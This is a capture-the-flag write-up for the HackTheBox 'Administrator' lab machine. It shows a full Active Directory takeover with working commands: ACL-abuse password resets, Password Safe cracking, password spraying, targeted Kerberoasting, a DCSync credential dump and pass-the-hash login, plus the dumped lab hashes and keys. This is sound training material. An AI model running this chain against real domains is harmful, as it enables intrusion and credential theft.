HackTheBox Administrator
Writeup for HackTheBox Administrator
HackTheBox Administrator
Machine Synopsis
Administrator is a medium-difficulty Windows machine designed around a complete domain compromise scenario, where credentials for a low-privileged user are provided. To gain access to the michael account, ACLs (Access Control Lists) over privileged objects are enumerated, leading us to discover that the user olivia has GenericAll permissions over michael, allowing us to reset his password. With access as michael, it is revealed that he can force a password change on the user benjamin, whose password is reset. This grants access to FTP where a backup.psafe3 file is discovered, cracked, and reveals credentials for several users. These credentials are sprayed across the domain, revealing valid credentials for the user emily. Further enumeration shows that emily has GenericWrite permissions over the user ethan, allowing us to perform a targeted Kerberoasting attack. The recovered hash is cracked and reveals valid credentials for ethan, who is found to have DCSync rights ultimately allowing retrieval of the Administrator account hash and full domain compromise. (Source)
Enumeration
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
❯ nmap -p- --min-rate 10000 10.10.11.42
PORT STATE SERVICE
21/tcp open ftp
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49671/tcp open unknown
65218/tcp open unknown
65223/tcp open unknown
65234/tcp open unknown
65245/tcp open unknown
65277/tcp open unknown
❯ nmap -p 21,53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49668,49671,65218,65223,65234,65245,65277 -sC -sV 10.10.11.42
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-02-07 13:57:09Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
65218/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
65223/tcp open msrpc Microsoft Windows RPC
65234/tcp open msrpc Microsoft Windows RPC
65245/tcp open msrpc Microsoft Windows RPC
65277/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-02-07T13:58:08
|_ start_date: N/A
|_clock-skew: 6h44m11s
Lets add the domain to the /etc/hosts file.
1
❯ echo -e '10.10.11.42\tadministrator.htb' | sudo tee -a /etc/hosts
Lets enumerate the users via the SMB service.
1
2
3
4
5
6
7
8
9
10
11
12
❯ nxc smb administrator.htb -u "Olivia" -p "ichliebedich" --rid-brute | grep SidTypeUser | awk '{print $6}'
ADMINISTRATOR\Administrator
ADMINISTRATOR\Guest
ADMINISTRATOR\krbtgt
ADMINISTRATOR\DC$
ADMINISTRATOR\olivia
ADMINISTRATOR\michael
ADMINISTRATOR\benjamin
ADMINISTRATOR\emily
ADMINISTRATOR\ethan
ADMINISTRATOR\alexander
ADMINISTRATOR\emma
Lets use Bloodhound to collect information about the AD.
1
❯ /usr/bin/bloodhound-python -u Olivia -p 'ichliebedich' -c All -d administrator.htb -ns 10.10.11.42
Exploitation
Analyzing the Bloodhound graph, we can observe that olivia has GenericAll permissions to michael. So lets change the password for michael.
1
2
❯ bloodyAD -u "olivia" -p "ichliebedich" -d "Administrator.htb" --host "10.10.11.42" set password "Michael" "P@ssw0rd"
[+] Password changed successfully!
michael has the permissions to ForceChangePassword for benjamin. So lets change the password for benjamin as michael.
1
2
❯ bloodyAD -u "Michael" -p "P@ssw0rd" -d "Administrator.htb" --host "10.10.11.42" set password "Benjamin" "P@ssw0rd"
[+] Password changed successfully!
benjamin belongs to the SHARE MODERATORS group and has the permissions to access shares.
Lets enumerate the SMB service.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
❯ nxc smb administrator.htb -u 'benjamin' -p 'P@ssw0rd' -M spider_plus
SMB 10.10.11.42 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.42 445 DC [+] administrator.htb\benjamin:P@ssw0rd
SPIDER_PLUS 10.10.11.42 445 DC [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.10.11.42 445 DC [*] DOWNLOAD_FLAG: False
SPIDER_PLUS 10.10.11.42 445 DC [*] STATS_FLAG: True
SPIDER_PLUS 10.10.11.42 445 DC [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.10.11.42 445 DC [*] EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.10.11.42 445 DC [*] MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.10.11.42 445 DC [*] OUTPUT_FOLDER: /tmp/nxc_hosted/nxc_spider_plus
SMB 10.10.11.42 445 DC [*] Enumerated shares
SMB 10.10.11.42 445 DC Share Permissions Remark
SMB 10.10.11.42 445 DC ----- ----------- ------
SMB 10.10.11.42 445 DC ADMIN$ Remote Admin
SMB 10.10.11.42 445 DC C$ Default share
SMB 10.10.11.42 445 DC IPC$ READ Remote IPC
SMB 10.10.11.42 445 DC NETLOGON READ Logon server share
SMB 10.10.11.42 445 DC SYSVOL READ Logon server share
SPIDER_PLUS 10.10.11.42 445 DC [+] Saved share-file metadata to "/tmp/nxc_hosted/nxc_spider_plus/10.10.11.42.json".
SPIDER_PLUS 10.10.11.42 445 DC [*] SMB Shares: 5 (ADMIN$, C$, IPC$, NETLOGON, SYSVOL)
SPIDER_PLUS 10.10.11.42 445 DC [*] SMB Readable Shares: 3 (IPC$, NETLOGON, SYSVOL)
SPIDER_PLUS 10.10.11.42 445 DC [*] SMB Filtered Shares: 1
SPIDER_PLUS 10.10.11.42 445 DC [*] Total folders found: 22
SPIDER_PLUS 10.10.11.42 445 DC [*] Total files found: 7
SPIDER_PLUS 10.10.11.42 445 DC [*] File size average: 1.25 KB
SPIDER_PLUS 10.10.11.42 445 DC [*] File size min: 22 B
SPIDER_PLUS 10.10.11.42 445 DC [*] File size max: 4.16 KB
Lets enumerate the FTP service.
1
2
3
4
❯ nxc ftp administrator.htb -u 'benjamin' -p 'P@ssw0rd' --ls
FTP 10.10.11.42 21 administrator.htb [+] benjamin:P@ssw0rd
FTP 10.10.11.42 21 administrator.htb [*] Directory Listing
FTP 10.10.11.42 21 administrator.htb 10-05-24 08:13AM 952 Backup.psafe3
We found a Backup.psafe3 file. Lets download it and convert the encrypted file to hash so that we can crack it with john.
1
2
3
4
5
6
❯ pwsafe2john Backup.psafe3
Backu:$pwsafe$*3*4ff588b74906263ad2abba592aba35d58bcd3a57e307bf79c8479dec6b3149aa*2048*1a941c10167252410ae04b7b43753aaedb4ec63e3f18c646bb084ec4f0944050
❯ pwsafe2john Backup.psafe3 > hash.txt
❯ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
tekieromucho (Backu)
We cracked the password tekieromucho.
Install Password Safe and open the file with the password found. In the file, we find 3 credentials.
1
2
3
alexander:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw
emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb
emma:WwANQWnmJnGV07WQN8bMS7FMAbjNur
Out of these 3 credentials, the credential for emily worked so lets login as emily.
1
2
3
4
5
6
7
8
9
10
❯ nxc smb administrator.htb -u users.txt -p passwords.txt --continue-on-success
SMB 10.10.11.42 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
...
SMB 10.10.11.42 445 DC [+] administrator.htb\emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb
...
❯ evil-winrm -i administrator.htb -u emily -p "UXLCI5iETUsIBoFVTj8yQFKoHjXmb"
*Evil-WinRM* PS C:\Users\emily\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\emily\Desktop> cat user.txt
0aabc6069d667366966c2fa02fc5dfb6
Privilege Escalation
Analyzing the Bloodhound, we can observe that emily has GenericWrite permissions over ethan. We can use targetedKerberoast to abuse this privilege.
1
2
3
4
5
6
❯ git clone https://github.com/ShutdownRepo/targetedKerberoast
❯ cd targetedKerberoast
❯ python3 targetedKerberoast.py -u "emily" -p "UXLCI5iETUsIBoFVTj8yQFKoHjXmb" -d "Administrator.htb" --dc-ip 10.10.11.42
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[!] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
It seems like there’s some timing issue. Lets update our time to match administrator.htb and try the command again.
1
2
3
4
5
6
❯ sudo ntpdate administrator.htb
❯ python3 targetedKerberoast.py -u "emily" -p "UXLCI5iETUsIBoFVTj8yQFKoHjXmb" -d "Administrator.htb" --dc-ip 10.10.11.42
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[+] Printing hash for (ethan)
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$Administrator.htb/ethan*$6ad5ea03366c9fe200e3761839026d07$872eab718dd10deb1bf910dda554fa78325ec8ddebc1881825f39fa15c4a48406dd630bc9b3e72159f7d09cfc92ec70502af2e412fa8b69f0f907cd1adcc1417db7a26d680c32acfb599099e6b8df91450d6d4c8813a768bb270b64d681fd2c1051bb9f69a56b6f2fa71c50b99b748fb7503f4b34cd0a514ab6b99209327a1325f9e16897d910026c32b3a01f613fe3f75d9a17b54216f19fc1bc2e9388a5488a1ddd975e7d5816c83594aec6e64ea4c6800d81c5aa1ddf3ec65660311c5f9de45e7ee7e1d95fb621af9d21a3623f89f310e154189f23361f1bb38cb66f94049092bb1c4baff935b8f7ed83fbc4d213482e47962143b2eff660e4ca69d5c8e572f7f897b821a19f0bb223b153f8404330306a9fef8ce7c426bbfce2ebab6cd139e5f3a7d3eacc1f95d299b7fa00651621ad921cd4c810545e88a4fb34c0f52cef22fe5e5e22f3b3f6a8618d33ccac619743c895a36d3a126e10a15e2b648ba794a17456ae354a7cd8417c669b12b81bf090ce9e09e1a707290b1d8afd7e0cb4c29f5fa03d0e09f7719f6494d272c5ed6795acdbbafe4034c186706f46e6e1c94de9fdcff7eb6cf257e182c913093fe333007f1345935981ea82dca2e37d4c5fd161979ab85f1c46205460483452db018f32b389ca809e87e823e5eda98af50bd6121eada40528a5184c049408de19d864a6f44f3c16d37fb4261c8dc427a02fc8e687d8f957f89dfcc4522b12850d0135ba2ca38e22034abeca710c2f3174514d1d60a63985a8725c8efbf548fc35ee28ce680c71ccf67e163daeb1f8fff8bee138e1dfe4e5bc67b5d1dca94d519438ea65e4590640dc8029620e105f9e6713a64d95b5be9c0eb662368162766c02dce4e22c9aa51768fe9bdd2144095a3ff80ad134b49283f27f13b348c2349b0ee8ecfd646a6712d81facbe62fa9401a048cbba856e2d5815f35bd5efdf5bef00fdbf852a6907bf1aed03ab36fca9646219bc77231a5830aaf3ef7103cc02fb106073cf6521502e0bd062270ef1b1b7a71bd09dfbd5342ccf46e0df3feefb608da6e9e2e702e0142311a72e9d3bf5f2f39b737a4cc29fc93492fda2e62a2c9fbf55cd700627b692b3412886edd2f1bf58d1111c4bfcaf57f1535c6827b67db733710f780c3ce1f91c608d98a7b65f1cd31dd6d6f3d4c4bde6214c9e5f66e590c51a7bcc11088a42112ef78351e5c627de6968c214cc009101fcf6f6d2295da1947fbaaad720d564b3dd5654999b776c61adf75877632094c908bf1d5bd3127f07d8bf8b9a1986a5c6b24a5bdabcd78b791b778c91e2685a694cb3c2c9594f808866aa16252a0b9c463c7502d6021b93b9dda0504e28a7d7184f065714b2a93a6bdbd1c9475b85297828e245be4105c0a9c923692677412453e94336d912f98b06045aae1a91b7349f0c6348fc6bc9c268927de9e6f330c13d15250edd499ccfffb092d6c4ea707f856ad781aed666a0858b5b3b4f688953d30608caf3961cf12da7b3cc6047bddc73511987adbd44e98d4
Save the hash to a file and crack it using john.
1
2
❯ john ethan_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
limpbizkit (?)
Nice, we found the password limpbizkit for ethan.
Analyzing the Bloodhound again, we can observe that ethan has DCSync privileges. We can now simply dump the secrets using ethan credentials via impacket-secretsdump.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
❯ sudo impacket-secretsdump administrator.htb/ethan:limpbizkit@'administrator.htb'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6:::
administrator.htb\olivia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
administrator.htb\michael:1109:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::
administrator.htb\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::
administrator.htb\emily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31:::
administrator.htb\ethan:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884:::
administrator.htb\alexander:3601:aad3b435b51404eeaad3b435b51404ee:cdc9e5f3b0631aa3600e0bfec00a0199:::
administrator.htb\emma:3602:aad3b435b51404eeaad3b435b51404ee:11ecd72c969a57c34c819b41b54455c9:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:cf411ddad4807b5b4a275d31caa1d4b3:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:9d453509ca9b7bec02ea8c2161d2d340fd94bf30cc7e52cb94853a04e9e69664
Administrator:aes128-cts-hmac-sha1-96:08b0633a8dd5f1d6cbea29014caea5a2
Administrator:des-cbc-md5:403286f7cdf18385
krbtgt:aes256-cts-hmac-sha1-96:920ce354811a517c703a217ddca0175411d4a3c0880c359b2fdc1a494fb13648
krbtgt:aes128-cts-hmac-sha1-96:aadb89e07c87bcaf9c540940fab4af94
krbtgt:des-cbc-md5:2c0bc7d0250dbfc7
administrator.htb\olivia:aes256-cts-hmac-sha1-96:713f215fa5cc408ee5ba000e178f9d8ac220d68d294b077cb03aecc5f4c4e4f3
administrator.htb\olivia:aes128-cts-hmac-sha1-96:3d15ec169119d785a0ca2997f5d2aa48
administrator.htb\olivia:des-cbc-md5:bc2a4a7929c198e9
administrator.htb\michael:aes256-cts-hmac-sha1-96:4ed0ccbbcd55dea4512bee5efb755cfa78768d0765725f89a5975b56449af907
administrator.htb\michael:aes128-cts-hmac-sha1-96:406d10f4bd6cd4c754722561eb2ab326
administrator.htb\michael:des-cbc-md5:3eb07fec43b99d4f
administrator.htb\benjamin:aes256-cts-hmac-sha1-96:f1c8d4df7dd722ac99a766f198b9a4b3a2fb7bf2edef1f1d181974b96f49aa90
administrator.htb\benjamin:aes128-cts-hmac-sha1-96:c167a547ec62b1320a3eea4bba3cb371
administrator.htb\benjamin:des-cbc-md5:3d3da4b91001d654
administrator.htb\emily:aes256-cts-hmac-sha1-96:53063129cd0e59d79b83025fbb4cf89b975a961f996c26cdedc8c6991e92b7c4
administrator.htb\emily:aes128-cts-hmac-sha1-96:fb2a594e5ff3a289fac7a27bbb328218
administrator.htb\emily:des-cbc-md5:804343fb6e0dbc51
administrator.htb\ethan:aes256-cts-hmac-sha1-96:e8577755add681a799a8f9fbcddecc4c3a3296329512bdae2454b6641bd3270f
administrator.htb\ethan:aes128-cts-hmac-sha1-96:e67d5744a884d8b137040d9ec3c6b49f
administrator.htb\ethan:des-cbc-md5:58387aef9d6754fb
administrator.htb\alexander:aes256-cts-hmac-sha1-96:b78d0aa466f36903311913f9caa7ef9cff55a2d9f450325b2fb390fbebdb50b6
administrator.htb\alexander:aes128-cts-hmac-sha1-96:ac291386e48626f32ecfb87871cdeade
administrator.htb\alexander:des-cbc-md5:49ba9dcb6d07d0bf
administrator.htb\emma:aes256-cts-hmac-sha1-96:951a211a757b8ea8f566e5f3a7b42122727d014cb13777c7784a7d605a89ff82
administrator.htb\emma:aes128-cts-hmac-sha1-96:aa24ed627234fb9c520240ceef84cd5e
administrator.htb\emma:des-cbc-md5:3249fba89813ef5d
DC$:aes256-cts-hmac-sha1-96:98ef91c128122134296e67e713b233697cd313ae864b1f26ac1b8bc4ec1b4ccb
DC$:aes128-cts-hmac-sha1-96:7068a4761df2f6c760ad9018c8bd206d
DC$:des-cbc-md5:f483547c4325492a
[*] Cleaning up...
Now we can login as administrator using winrm.
1
2
3
4
❯ evil-winrm -i administrator.htb -u administrator -H "3dc553ce4b9fd20bd016e098d2d2fd2e"
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
a3c490270f15be682d6c409a5ac66ac3
This post is licensed under CC BY 4.0 by the author.